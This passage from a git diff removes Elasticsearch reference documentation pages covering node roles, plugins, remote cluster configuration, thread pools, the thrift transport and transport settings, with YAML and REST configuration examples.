-between nodes within a cluster, for communication with a -<>, and for the -{javaclient}/transport-client.html[Java Transport client] to communicate with a -cluster. - -The network settings described above apply to both methods of communication, -and you can also configure each interface separately if needed. See the -<> and <> pages for more -details on their respective configurations. diff --git a/docs/reference/modules/node.asciidoc b/docs/reference/modules/node.asciidoc deleted file mode 100644 index 5f5dbad43d9..00000000000 --- a/docs/reference/modules/node.asciidoc +++ /dev/null @@ -1,453 +0,0 @@ -[[modules-node]] -=== Node - -Any time that you start an instance of {es}, you are starting a _node_. A -collection of connected nodes is called a <>. If you -are running a single node of {es}, then you have a cluster of one node. - -Every node in the cluster can handle <> and -<> traffic by default. The transport layer is used -exclusively for communication between nodes; the HTTP layer is used by REST -clients. -[[modules-node-description]] -// tag::modules-node-description-tag[] -All nodes know about all the other nodes in the cluster and can forward client -requests to the appropriate node. - -By default, a node is all of the following types: master-eligible, data, ingest, -and (if available) machine learning. All data nodes are also transform nodes. -// end::modules-node-description-tag[] - -TIP: As the cluster grows and in particular if you have large {ml} jobs or -{ctransforms}, consider separating dedicated master-eligible nodes from -dedicated data nodes, {ml} nodes, and {transform} nodes. - -[[node-roles]] -==== Node roles - -You can define the roles of a node by setting `node.roles`. If you don't -configure this setting, then the node has the following roles by default: - -* `master` -* `data` -* `data_content` -* `data_hot` -* `data_warm` -* `data_cold` -* `ingest` -* `ml` -* `remote_cluster_client` - -NOTE: If you set `node.roles`, the node is assigned only the roles you specify. - -<>:: - -A node that has the `master` role (default), which makes it eligible to be -<>, which controls the cluster. - -<>:: - -A node that has the `data` role (default). Data nodes hold data and perform data -related operations such as CRUD, search, and aggregations. A node with the `data` role can fill any of the specialised data node roles. - -<>:: - -A node that has the `ingest` role (default). Ingest nodes are able to apply an -<> to a document in order to transform and enrich the -document before indexing. With a heavy ingest load, it makes sense to use -dedicated ingest nodes and to not include the `ingest` role from nodes that have -the `master` or `data` roles. - -<>:: - -A node that has the `remote_cluster_client` role (default), which makes it -eligible to act as a remote client. By default, any node in the cluster can act -as a cross-cluster client and connect to remote clusters. - -<>:: - -A node that has `xpack.ml.enabled` and the `ml` role, which is the default -behavior in the {es} {default-dist}. If you want to use {ml-features}, there -must be at least one {ml} node in your cluster. For more information about -{ml-features}, see {ml-docs}/index.html[Machine learning in the {stack}]. -+ -IMPORTANT: If you use the {oss-dist}, do not add the `ml` role. Otherwise, the -node fails to start. - -<>:: - -A node that has the `transform` role. If you want to use {transforms}, there -be at least one {transform} node in your cluster. For more information, see -<> and <>. - -[NOTE] -[[coordinating-node]] -.Coordinating node -=============================================== - -Requests like search requests or bulk-indexing requests may involve data held -on different data nodes. A search request, for example, is executed in two -phases which are coordinated by the node which receives the client request -- -the _coordinating node_. - -In the _scatter_ phase, the coordinating node forwards the request to the data -nodes which hold the data. Each data node executes the request locally and -returns its results to the coordinating node. In the _gather_ phase, the -coordinating node reduces each data node's results into a single global -result set. - -Every node is implicitly a coordinating node. This means that a node that has -an explicit empty list of roles via `node.roles` will only act as a coordinating -node, which cannot be disabled. As a result, such a node needs to have enough -memory and CPU in order to deal with the gather phase. - -=============================================== - -[[master-node]] -==== Master-eligible node - -The master node is responsible for lightweight cluster-wide actions such as -creating or deleting an index, tracking which nodes are part of the cluster, -and deciding which shards to allocate to which nodes. It is important for -cluster health to have a stable master node. - -Any master-eligible node that is not a <> may -be elected to become the master node by the <>. - -IMPORTANT: Master nodes must have access to the `data/` directory (just like -`data` nodes) as this is where the cluster state is persisted between node -restarts. - -[[dedicated-master-node]] -===== Dedicated master-eligible node - -It is important for the health of the cluster that the elected master node has -the resources it needs to fulfill its responsibilities. If the elected master -node is overloaded with other tasks then the cluster may not operate well. In -particular, indexing and searching your data can be very resource-intensive, so -in large or high-throughput clusters it is a good idea to avoid using the -master-eligible nodes for tasks such as indexing and searching. You can do this -by configuring three of your nodes to be dedicated master-eligible nodes. -Dedicated master-eligible nodes only have the `master` role, allowing them to -focus on managing the cluster. While master nodes can also behave as -<> and route search and indexing requests -from clients to data nodes, it is better _not_ to use dedicated master nodes for -this purpose. - -To create a dedicated master-eligible node, set: - -[source,yaml] -------------------- -node.roles: [ master ] -------------------- - -[[voting-only-node]] -===== Voting-only master-eligible node - -A voting-only master-eligible node is a node that participates in -<> but which will not act as the cluster's -elected master node. In particular, a voting-only node can serve as a tiebreaker -in elections. - -It may seem confusing to use the term "master-eligible" to describe a -voting-only node since such a node is not actually eligible to become the master -at all. This terminology is an unfortunate consequence of history: -master-eligible nodes are those nodes that participate in elections and perform -certain tasks during cluster state publications, and voting-only nodes have the -same responsibilities even if they can never become the elected master. - -To configure a master-eligible node as a voting-only node, include `master` and -`voting_only` in the list of roles. For example to create a voting-only data -node: - -[source,yaml] -------------------- -node.roles: [ data, master, voting_only ] -------------------- - -IMPORTANT: The `voting_only` role requires the {default-dist} of {es} and is not -supported in the {oss-dist}. If you use the {oss-dist} and add the `voting_only` -role then the node will fail to start. Also note that only nodes with the -`master` role can be marked as having the `voting_only` role. - -High availability (HA) clusters require at least three master-eligible nodes, at -least two of which are not voting-only nodes. Such a cluster will be able to -elect a master node even if one of the nodes fails. - -Since voting-only nodes never act as the cluster's elected master, they may -require less heap and a less powerful CPU than the true master nodes. -However all master-eligible nodes, including voting-only nodes, require -reasonably fast persistent storage and a reliable and low-latency network -connection to the rest of the cluster, since they are on the critical path for -<>. - -Voting-only master-eligible nodes may also fill other roles in your cluster. -For instance, a node may be both a data node and a voting-only master-eligible -node. A _dedicated_ voting-only master-eligible nodes is a voting-only -master-eligible node that fills no other roles in the cluster. To create a -dedicated voting-only master-eligible node in the {default-dist}, set: - -[source,yaml] -------------------- -node.roles: [ master, voting_only ] -------------------- - -[[data-node]] -==== Data node - -Data nodes hold the shards that contain the documents you have indexed. Data -nodes handle data related operations like CRUD, search, and aggregations. -These operations are I/O-, memory-, and CPU-intensive. It is important to -monitor these resources and to add more data nodes if they are overloaded. - -The main benefit of having dedicated data nodes is the separation of the master -and data roles. - -To create a dedicated data node, set: -[source,yaml] ----- -node.roles: [ data ] ----- - -In a multi-tier deployment architecture, you use specialised data roles to assign data nodes to specific tiers: `data_content`,`data_hot`, -`data_warm`, or `data_cold`. A node can belong to multiple tiers, but a node that has one of the specialised data roles cannot have the -generic `data` role. - -[[data-content-node]] -==== [x-pack]#Content data node# - -Content data nodes accommodate user-created content. They enable operations like CRUD, -search and aggregations. - -To create a dedicated content node, set: -[source,yaml] ----- -node.roles: [ data_content ] ----- - -[[data-hot-node]] -==== [x-pack]#Hot data node# - -Hot data nodes store time series data as it enters {es}. The hot tier must be fast for -both reads and writes, and requires more hardware resources (such as SSD drives). - -To create a dedicated hot node, set: -[source,yaml] ----- -node.roles: [ data_hot ] ----- - -[[data-warm-node]] -==== [x-pack]#Warm data node# - -Warm data nodes store indices that are no longer being regularly updated, but are still being -queried. Query volume is usually at a lower frequency than it was while the index was in the hot tier. -Less performant hardware can usually be used for nodes in this tier. - -To create a dedicated warm node, set: -[source,yaml] ----- -node.roles: [ data_warm ] ----- - -[[data-cold-node]] -==== [x-pack]#Cold data node# - -Cold data nodes store read-only indices that are accessed less frequently. This tier uses less performant hardware and may leverage searchable snapshot indices to minimize the resources required. - -To create a dedicated cold node, set: -[source,yaml] ----- -node.roles: [ data_cold ] ----- - -[[node-ingest-node]] -==== Ingest node - -Ingest nodes can execute pre-processing pipelines, composed of one or more -ingest processors. Depending on the type of operations performed by the ingest -processors and the required resources, it may make sense to have dedicated -ingest nodes, that will only perform this specific task. - -To create a dedicated ingest node, set: - -[source,yaml] ----- -node.roles: [ ingest ] ----- - -[[coordinating-only-node]] -==== Coordinating only node - -If you take away the ability to be able to handle master duties, to hold data, -and pre-process documents, then you are left with a _coordinating_ node that -can only route requests, handle the search reduce phase, and distribute bulk -indexing. Essentially, coordinating only nodes behave as smart load balancers. - -Coordinating only nodes can benefit large clusters by offloading the -coordinating node role from data and master-eligible nodes. They join the -cluster and receive the full <>, like every other -node, and they use the cluster state to route requests directly to the -appropriate place(s). - -WARNING: Adding too many coordinating only nodes to a cluster can increase the -burden on the entire cluster because the elected master node must await -acknowledgement of cluster state updates from every node! The benefit of -coordinating only nodes should not be overstated -- data nodes can happily -serve the same purpose. - -To create a dedicated coordinating node, set: - -[source,yaml] ----- -node.roles: [ ] ----- - -[[remote-node]] -==== Remote-eligible node - -By default, any node in a cluster can act as a cross-cluster client and connect -to <>. Once connected, you can search -remote clusters using <>. You can also sync -data between clusters using <>. - -[source,yaml] ----- -node.roles: [ remote_cluster_client ] ----- - -[[ml-node]] -==== [xpack]#Machine learning node# - -The {ml-features} provide {ml} nodes, which run jobs and handle {ml} API -requests. If `xpack.ml.enabled` is set to `true` and the node does not have the -`ml` role, the node can service API requests but it cannot run jobs. - -If you want to use {ml-features} in your cluster, you must enable {ml} -(set `xpack.ml.enabled` to `true`) on all master-eligible nodes. If you want to -use {ml-features} in clients (including {kib}), it must also be enabled on all -coordinating nodes. If you have the {oss-dist}, do not use these settings. - -For more information about these settings, see <>. - -To create a dedicated {ml} node in the {default-dist}, set: - -[source,yaml] ----- -node.roles: [ ml ] -xpack.ml.enabled: true <1> ----- -<1> The `xpack.ml.enabled` setting is enabled by default. - -[[transform-node]] -==== [xpack]#{transform-cap} node# - -{transform-cap} nodes run {transforms} and handle {transform} API requests. If -you have the {oss-dist}, do not use these settings. For more information, see -<>. - -To create a dedicated {transform} node in the {default-dist}, set: - -[source,yaml] ----- -node.roles: [ transform ] ----- - -[[change-node-role]] -==== Changing the role of a node - -Each data node maintains the following data on disk: - -* the shard data for every shard allocated to that node, -* the index metadata corresponding with every shard allocated to that node, and -* the cluster-wide metadata, such as settings and index templates. - -Similarly, each master-eligible node maintains the following data on disk: - -* the index metadata for every index in the cluster, and -* the cluster-wide metadata, such as settings and index templates. - -Each node checks the contents of its data path at startup. If it discovers -unexpected data then it will refuse to start. This is to avoid importing -unwanted <> which can lead -to a red cluster health. To be more precise, nodes without the `data` role will -refuse to start if they find any shard data on disk at startup, and nodes -without both the `master` and `data` roles will refuse to start if they have any -index metadata on disk at startup. - -It is possible to change the roles of a node by adjusting its -`elasticsearch.yml` file and restarting it. This is known as _repurposing_ a -node. In order to satisfy the checks for unexpected data described above, you -must perform some extra steps to prepare a node for repurposing when starting -the node without the `data` or `master` roles. - -* If you want to repurpose a data node by removing the `data` role then you - should first use an <> to safely - migrate all the shard data onto other nodes in the cluster. - -* If you want to repurpose a node to have neither the `data` nor `master` roles - then it is simplest to start a brand-new node with an empty data path and the - desired roles. You may find it safest to use an - <> to migrate the shard data elsewhere - in the cluster first. - -If it is not possible to follow these extra steps then you may be able to use -the <> tool to delete any -excess data that prevents a node from starting. - -[discrete] -=== Node data path settings - -[[data-path]] -==== `path.data` - -Every data and master-eligible node requires access to a data directory where -shards and index and cluster metadata will be stored. The `path.data` defaults -to `$ES_HOME/data` but can be configured in the `elasticsearch.yml` config -file an absolute path or a path relative to `$ES_HOME` as follows: - -[source,yaml] ----- -path.data: /var/elasticsearch/data ----- - -Like all node settings, it can also be specified on the command line as: - -[source,sh] ----- -./bin/elasticsearch -Epath.data=/var/elasticsearch/data ----- - -TIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting -should be configured to locate the data directory outside the {es} home -directory, so that the home directory can be deleted without deleting your data! -The RPM and Debian distributions do this for you already. - -[discrete] -[[max-local-storage-nodes]] -=== `node.max_local_storage_nodes` - -The <> can be shared by multiple nodes, even by nodes from -different clusters. It is recommended however to only run one node of {es} using -the same data path. This setting is deprecated in 7.x and will be removed in -version 8.0. - -By default, {es} is configured to prevent more than one node from sharing the -same data path. To allow for more than one node (e.g., on your development -machine), use the setting `node.max_local_storage_nodes` and set this to a -positive integer larger than one. - -WARNING: Never run different node types (i.e. master, data) from the same data -directory. This can lead to unexpected data loss. - -[discrete] -[[other-node-settings]] -=== Other node settings - -More node settings can be found in <> and <>, -including: - -* <> -* <> -* <> diff --git a/docs/reference/modules/plugins.asciidoc b/docs/reference/modules/plugins.asciidoc deleted file mode 100644 index d2ea1fe675b..00000000000 --- a/docs/reference/modules/plugins.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[modules-plugins]] -== Plugins - -Plugins are a way to enhance the basic Elasticsearch functionality in a -custom manner. They range from adding custom mapping types, custom -analyzers (in a more built in fashion), custom script engines, custom discovery -and more. - -For information about selecting and installing plugins, see -{plugins}/index.html[{es} Plugins and Integrations]. - -For information about developing your own plugin, see -{plugins}/plugin-authors.html[Help for plugin authors]. diff --git a/docs/reference/modules/remote-clusters.asciidoc b/docs/reference/modules/remote-clusters.asciidoc deleted file mode 100644 index c44e81678b3..00000000000 --- a/docs/reference/modules/remote-clusters.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[[modules-remote-clusters]] -== Remote clusters - -You can connect a local cluster to other {es} clusters, known as _remote -clusters_. Once connected, you can search remote clusters using -<>. You can also sync data between clusters -using <>. - -To register a remote cluster, connect the local cluster to nodes in the -remote cluster using one of two connection modes: - -* <> -* <> - -Your local cluster uses the <> to establish -communication with remote clusters. The coordinating nodes in the local cluster -establish <> TCP connections with specific -nodes in the remote cluster. {es} requires these connections to remain open, -even if the connections are idle for an extended period. - -You can use the <> to get -information about registered remote clusters. - -[[sniff-mode]] -[discrete] -==== Sniff mode - -In sniff mode, a cluster is created using a name and a list of seed nodes. When -a remote cluster is registered, its cluster state is retrieved from one of the -seed nodes and up to three _gateway nodes_ are selected as part of remote -cluster requests. This mode requires that the gateway node's publish addresses -are accessible by the local cluster. - -Sniff mode is the default connection mode. - -[[gateway-nodes-selection]] -The _gateway nodes_ selection depends on the following criteria: - -* *version*: Remote nodes must be compatible with the cluster they are -registered to, similar to the rules for -<>: -** Any node can communicate with another node on the same -major version. For example, 7.0 can talk to any 7.x node. -** Only nodes on the last minor version of a certain major version can -communicate with nodes on the following major version. In the 6.x series, 6.8 -can communicate with any 7.x node, while 6.7 can only communicate with 7.0. -** Version compatibility is -symmetric, meaning that if 6.7 can communicate with 7.0, 7.0 can also -communicate with 6.7. The following table depicts version compatibility between -local and remote nodes. -+ -[%collapsible] -.Version compatibility table -==== -// tag::remote-cluster-compatibility-matrix[] -[cols="^,^,^,^,^,^,^,^"] -|==== -| 7+^h| Local cluster -h| Remote cluster | 5.0->5.5 | 5.6 | 6.0->6.6 | 6.7 | 6.8 | 7.0 | 7.1->7.x -| 5.0->5.5 | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} | {no-icon} | {no-icon} | {no-icon} -| 5.6 | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} -| 6.0->6.6 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} -| 6.7 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} -| 6.8 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} -| 7.0 | {no-icon} | {no-icon} | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} -| 7.1->7.x | {no-icon} | {no-icon} | {no-icon} | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} -|==== -// end::remote-cluster-compatibility-matrix[] -==== - -* *role*: Dedicated master nodes are never selected as gateway nodes. -* *attributes*: You can tag which nodes should be selected -(see <>), though such tagged nodes still have -to satisfy the two above requirements. - -[[proxy-mode]] -[discrete] -==== Proxy mode - -In proxy mode, a cluster is created using a name and a single proxy address. -When you register a remote cluster, a configurable number of socket connections -are opened to the proxy address. The proxy is required to route those -connections to the remote cluster. Proxy mode does not require remote cluster -nodes to have accessible publish addresses. - -The proxy mode is not the default connection mode and must be configured. Similar -to the sniff <>, the remote -connections are subject to the same version compatibility rules as -<>. - -[discrete] -[[configuring-remote-clusters]] -=== Configuring remote clusters - -You can configure remote clusters settings <>, or configure -settings <> in the -`elasticsearch.yml` file. - -[discrete] -[[configure-remote-clusters-dynamic]] -===== Dynamically configure remote clusters -Use the <> to dynamically -configure remote settings on every node in the cluster. For example: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ], - "transport.ping_schedule": "30s" - }, - "cluster_two": { - "mode": "sniff", - "seeds": [ - "127.0.0.1:9301" - ], - "transport.compress": true, - "skip_unavailable": true - }, - "cluster_three": { - "mode": "proxy", - "proxy_address": "127.0.0.1:9302" - } - } - } - } -} --------------------------------- -// TEST[setup:host] -// TEST[s/127.0.0.1:9300/\${transport_host}/] - -You can dynamically update the compression and ping schedule settings. However, -you must re-include seeds or `proxy_address` in the settings update request. -For example: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ], - "transport.ping_schedule": "60s" - }, - "cluster_two": { - "mode": "sniff", - "seeds": [ - "127.0.0.1:9301" - ], - "transport.compress": false - }, - "cluster_three": { - "mode": "proxy", - "proxy_address": "127.0.0.1:9302", - "transport.compress": true - } - } - } - } -} --------------------------------- -// TEST[continued] - -NOTE: When the compression or ping schedule settings change, all the existing -node connections must close and re-open, which can cause in-flight requests to -fail. - -You can delete a remote cluster from the cluster settings by passing `null` -values for each remote cluster setting: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_two": { <1> - "mode": null, - "seeds": null, - "skip_unavailable": null, - "transport": { - "compress": null - } - } - } - } - } -} --------------------------------- -// TEST[continued] - -<1> `cluster_two` would be removed from the cluster settings, leaving -`cluster_one` and `cluster_three` intact. - -[discrete] -[[configure-remote-clusters-static]] -===== Statically configure remote clusters -If you specify settings in `elasticsearch.yml` files, only the nodes with -those settings can connect to the remote cluster and serve remote cluster requests. For example: - -[source,yaml] --------------------------------- -cluster: - remote: - cluster_one: <1> - seeds: 127.0.0.1:9300 <2> - transport.ping_schedule: 30s <3> - cluster_two: <1> - mode: sniff <4> - seeds: 127.0.0.1:9301 <2> - transport.compress: true <5> - skip_unavailable: true <6> - cluster_three: <1> - mode: proxy <4> - proxy_address: 127.0.0.1:9302 <7> - --------------------------------- -<1> `cluster_one`, `cluster_two`, and `cluster_three` are arbitrary _cluster aliases_ -representing the connection to each cluster. These names are subsequently used to -distinguish between local and remote indices. -<2> The hostname and <> port (default: 9300) of a -seed node in the remote cluster. -<3> A keep-alive ping is configured for `cluster_one`. -<4> The configured connection mode. By default, this is <>, so -the mode is implicit for `cluster_one`. However, it can be explicitly configured -as demonstrated by `cluster_two` and must be explicitly configured for -<> as demonstrated by `cluster_three`. -<5> Compression is explicitly enabled for requests to `cluster_two`. -<6> Disconnected remote clusters are optional for `cluster_two`. -<7> The address for the proxy endpoint used to connect to `cluster_three`. - -[discrete] -[[remote-cluster-settings]] -=== Global remote cluster settings - -These settings apply to both <> and -<>. <> -and <> are described -separately. - -`cluster.remote..mode`:: - The mode used for a remote cluster connection. The only supported modes are - `sniff` and `proxy`. - -`cluster.remote.initial_connect_timeout`:: - - The time to wait for remote connections to be established when the node - starts. The default is `30s`. - -`node.remote_cluster_client`:: - - By default, any node in the cluster can act as a cross-cluster client and - connect to remote clusters. The `node.remote_cluster_client` setting can be - set to `false` (defaults to `true`) to prevent certain nodes from connecting - to remote clusters. Remote cluster requests must be sent to a node that is - allowed to act as a cross-cluster client. - -`cluster.remote..skip_unavailable`:: - - Per cluster boolean setting that allows to skip specific clusters when no - nodes belonging to them are available and they are the target of a remote - cluster request. Default is `false`, meaning that all clusters are mandatory - by default, but they can selectively be made optional by setting this setting - to `true`. - -`cluster.remote..transport.ping_schedule`:: - - Sets the time interval between regular application-level ping messages that - are sent to ensure that transport connections to nodes belonging to remote - clusters are kept alive. If set to `-1`, application-level ping messages to - this remote cluster are not sent. If unset, application-level ping messages - are sent according to the global `transport.ping_schedule` setting, which - defaults to `-1` meaning that pings are not sent. - -`cluster.remote..transport.compress`:: - - Per cluster boolean setting that enables you to configure compression for - requests to a specific remote cluster. This setting impacts only requests - sent to the remote cluster. If the inbound request is compressed, - Elasticsearch compresses the response. If unset, the global - `transport.compress` is used as the fallback setting. - -[discrete] -[[remote-cluster-sniff-settings]] -=== Sniff mode remote cluster settings - -`cluster.remote..seeds`:: - - The list of seed nodes used to sniff the remote cluster state. - -`cluster.remote..node_connections`:: - - The number of gateway nodes to connect to for this remote cluster. The default - is `3`. - -`cluster.remote.node.attr`:: - - A node attribute to filter out nodes that are eligible as a gateway node in - the remote cluster. For instance a node can have a node attribute - `node.attr.gateway: true` such that only nodes with this attribute will be - connected to if `cluster.remote.node.attr` is set to `gateway`. - -[discrete] -[[remote-cluster-proxy-settings]] -=== Proxy mode remote cluster settings - -`cluster.remote..proxy_address`:: - - The address used for all remote connections. - -`cluster.remote..proxy_socket_connections`:: - - The number of socket connections to open per remote cluster. The default is - `18`. - -[role="xpack"] -`cluster.remote..server_name`:: - - An optional hostname string which is sent in the `server_name` field of - the TLS Server Name Indication extension if - <>. The TLS transport will fail to open - remote connections if this field is not a valid hostname as defined by the - TLS SNI specification. diff --git a/docs/reference/modules/threadpool.asciidoc b/docs/reference/modules/threadpool.asciidoc deleted file mode 100644 index 55623741104..00000000000 --- a/docs/reference/modules/threadpool.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[modules-threadpool]] -=== Thread pools - -A node uses several thread pools to manage memory consumption. -Queues associated with many of the thread pools enable pending requests -to be held instead of discarded. - -There are several thread pools, but the important ones include: - -`generic`:: - For generic operations (for example, background node discovery). - Thread pool type is `scaling`. - -[[search-threadpool]] -`search`:: - For count/search/suggest operations. Thread pool type is - `fixed_auto_queue_size` with a size of `int((`<>`pass:[ * ]3) / 2) + 1`, and initial queue_size of - `1000`. - -[[search-throttled]]`search_throttled`:: - For count/search/suggest/get operations on `search_throttled indices`. - Thread pool type is `fixed_auto_queue_size` with a size of `1`, and initial - queue_size of `100`. - -`get`:: - For get operations. Thread pool type is `fixed` - with a size of <>, - queue_size of `1000`. - -`analyze`:: - For analyze requests. Thread pool type is `fixed` with a size of `1`, queue - size of `16`. - -`write`:: - For single-document index/delete/update and bulk requests. Thread pool type - is `fixed` with a size of <>, - queue_size of `10000`. The maximum size for this pool is - `pass:[1 + ]`<>. - -`snapshot`:: - For snapshot/restore operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(5, (`<>`) / 2)`. - -`warmer`:: - For segment warm-up operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(5, (`<>`) / 2)`. - -`refresh`:: - For refresh operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(10, (`<>`) / 2)`. - -`listener`:: - Mainly for java client executing of action when listener threaded is set to - `true`. Thread pool type is `scaling` with a default max of - `min(10, (`<>`) / 2)`. - -`fetch_shard_started`:: - For listing shard states. - Thread pool type is `scaling` with keep-alive of `5m` and a default maximum - size of `pass:[2 * ]`<>. - -`fetch_shard_store`:: - For listing shard stores. - Thread pool type is `scaling` with keep-alive of `5m` and a default maximum - size of `pass:[2 * ]`<>. - -`flush`:: - For <>, <>, and - <> `fsync` operations. Thread pool type is - `scaling` with a keep-alive of `5m` and a default maximum size of `min(5, (` - <>`) / 2)`. - -`force_merge`:: - For <> operations. - Thread pool type is `fixed` with a size of 1 and an unbounded queue size. - -`management`:: - For cluster management. - Thread pool type is `scaling` with a keep-alive of `5m` and a default - maximum size of `5`. - -`system_read`:: - For read operations on system indices. - Thread pool type is `fixed` and a default maximum size of - `min(5, (`<>`) / 2)`. - -`system_write`:: - For write operations on system indices. - Thread pool type is `fixed` and a default maximum size of - `min(5, (`<>`) / 2)`. - -Changing a specific thread pool can be done by setting its type-specific -parameters; for example, changing the number of threads in the `write` thread -pool: - -[source,yaml] --------------------------------------------------- -thread_pool: - write: - size: 30 --------------------------------------------------- - -[[thread-pool-types]] -==== Thread pool types - -The following are the types of thread pools and their respective parameters: - -[[fixed-thread-pool]] -===== `fixed` - -The `fixed` thread pool holds a fixed size of threads to handle the -requests with a queue (optionally bounded) for pending requests that -have no threads to service them. - -The `size` parameter controls the number of threads. - -The `queue_size` allows to control the size of the queue of pending -requests that have no threads to execute them. By default, it is set to -`-1` which means its unbounded. When a request comes in and the queue is -full, it will abort the request. - -[source,yaml] --------------------------------------------------- -thread_pool: - write: - size: 30 - queue_size: 1000 --------------------------------------------------- - -[[fixed-auto-queue-size]] -===== `fixed_auto_queue_size` - -experimental[] - -deprecated[7.7.0,The experimental `fixed_auto_queue_size` thread pool type is -deprecated and will be removed in 8.0.] - -The `fixed_auto_queue_size` thread pool holds a fixed size of threads to handle -the requests with a bounded queue for pending requests that have no threads to -service them. It's similar to the `fixed` threadpool, however, the `queue_size` -automatically adjusts according to calculations based on -https://en.wikipedia.org/wiki/Little%27s_law[Little's Law]. These calculations -will potentially adjust the `queue_size` up or down by 50 every time -`auto_queue_frame_size` operations have been completed. - -The `size` parameter controls the number of threads. - -The `queue_size` allows to control the initial size of the queue of pending -requests that have no threads to execute them. - -The `min_queue_size` setting controls the minimum amount the `queue_size` can be -adjusted to. - -The `max_queue_size` setting controls the maximum amount the `queue_size` can be -adjusted to. - -The `auto_queue_frame_size` setting controls the number of operations during -which measurement is taken before the queue is adjusted. It should be large -enough that a single operation cannot unduly bias the calculation. - -The `target_response_time` is a time value setting that indicates the targeted -average response time for tasks in the thread pool queue. If tasks are routinely -above this time, the thread pool queue will be adjusted down so that tasks are -rejected. - -[source,yaml] --------------------------------------------------- -thread_pool: - search: - size: 30 - queue_size: 500 - min_queue_size: 10 - max_queue_size: 1000 - auto_queue_frame_size: 2000 - target_response_time: 1s --------------------------------------------------- - -[[scaling-thread-pool]] -===== `scaling` - -The `scaling` thread pool holds a dynamic number of threads. This -number is proportional to the workload and varies between the value of -the `core` and `max` parameters. - -The `keep_alive` parameter determines how long a thread should be kept -around in the thread pool without it doing any work. - -[source,yaml] --------------------------------------------------- -thread_pool: - warmer: - core: 1 - max: 8 - keep_alive: 2m --------------------------------------------------- - -[[node.processors]] -==== Allocated processors setting - -The number of processors is automatically detected, and the thread pool settings -are automatically set based on it. In some cases it can be useful to override -the number of detected processors. This can be done by explicitly setting the -`node.processors` setting. - -[source,yaml] --------------------------------------------------- -node.processors: 2 --------------------------------------------------- - -There are a few use-cases for explicitly overriding the `node.processors` -setting: - -. If you are running multiple instances of {es} on the same host but want want -{es} to size its thread pools as if it only has a fraction of the CPU, you -should override the `node.processors` setting to the desired fraction, for -example, if you're running two instances of {es} on a 16-core machine, set -`node.processors` to 8. Note that this is an expert-level use case and there's -a lot more involved than just setting the `node.processors` setting as there are -other considerations like changing the number of garbage collector threads, -pinning processes to cores, and so on. -. Sometimes the number of processors is wrongly detected and in such cases -explicitly setting the `node.processors` setting will workaround such issues. - -In order to check the number of processors detected, use the nodes info -API with the `os` flag. diff --git a/docs/reference/modules/thrift.asciidoc b/docs/reference/modules/thrift.asciidoc deleted file mode 100644 index 1ea3f818126..00000000000 --- a/docs/reference/modules/thrift.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -[[modules-thrift]] -== Thrift - -The https://thrift.apache.org/[thrift] transport module allows to expose the REST interface of -Elasticsearch using thrift. Thrift should provide better performance -over http. Since thrift provides both the wire protocol and the -transport, it should make using Elasticsearch more efficient (though it has limited -documentation). - -Using thrift requires installing the `transport-thrift` plugin, located -https://github.com/elastic/elasticsearch-transport-thrift[here]. - -The thrift -https://github.com/elastic/elasticsearch-transport-thrift/blob/master/elasticsearch.thrift[schema] -can be used to generate thrift clients. - -[cols="<,<",options="header",] -|======================================================================= -|Setting |Description -|`thrift.port` |The port to bind to. Defaults to 9500-9600 - -|`thrift.frame` |Defaults to `-1`, which means no framing. Set to a -higher value to specify the frame size (like `15mb`). -|======================================================================= - diff --git a/docs/reference/modules/transport.asciidoc b/docs/reference/modules/transport.asciidoc deleted file mode 100644 index c40ae9c34b5..00000000000 --- a/docs/reference/modules/transport.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[[modules-transport]] -=== Transport - -REST clients send requests to your {es} cluster over <>, but -the node that receives a client request cannot always handle it alone and must -normally pass it on to other nodes for further processing. It does this using -the transport networking layer. The transport layer is used for all internal -communication between nodes within a cluster, all communication with the nodes -of a <>, and also by the -`TransportClient` in the {es} Java API. - -[[transport-settings]] -==== Transport settings - -The following settings can be configured for the internal transport that -communicates over TCP. These settings also use the common -<>. - -`transport.port`:: -(<>) -A bind port range. Defaults to `9300-9400`. - -`transport.publish_port`:: -(<>) -The port that other nodes in the cluster -should use when communicating with this node. Useful when a cluster node -is behind a proxy or firewall and the `transport.port` is not directly -addressable from the outside. Defaults to the actual port assigned via -`transport.port`. - -`transport.bind_host`:: -(<>) -The host address to bind the transport service to. Defaults to -`transport.host` (if set) or `network.bind_host`. - -`transport.publish_host`:: -(<>) -The host address to publish for nodes in the cluster to connect to. -Defaults to `transport.host` (if set) or `network.publish_host`. - -`transport.host`:: -(<>) -Used to set the `transport.bind_host` and the `transport.publish_host`. - -`transport.connect_timeout`:: -(<>) -The connect timeout for initiating a new connection (in -time setting format). Defaults to `30s`. - -`transport.compress`:: -(<>) -Set to `true` to enable compression (`DEFLATE`) between -all nodes. Defaults to `false`. - -`transport.ping_schedule`:: -(<>) -Schedule a regular application-level ping message -to ensure that transport connections between nodes are kept alive. Defaults to -`5s` in the transport client and `-1` (disabled) elsewhere. It is preferable -to correctly configure TCP keep-alives instead of using this feature, because -TCP keep-alives apply to all kinds of long-lived connections and not just to -transport connections. - -`transport.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to 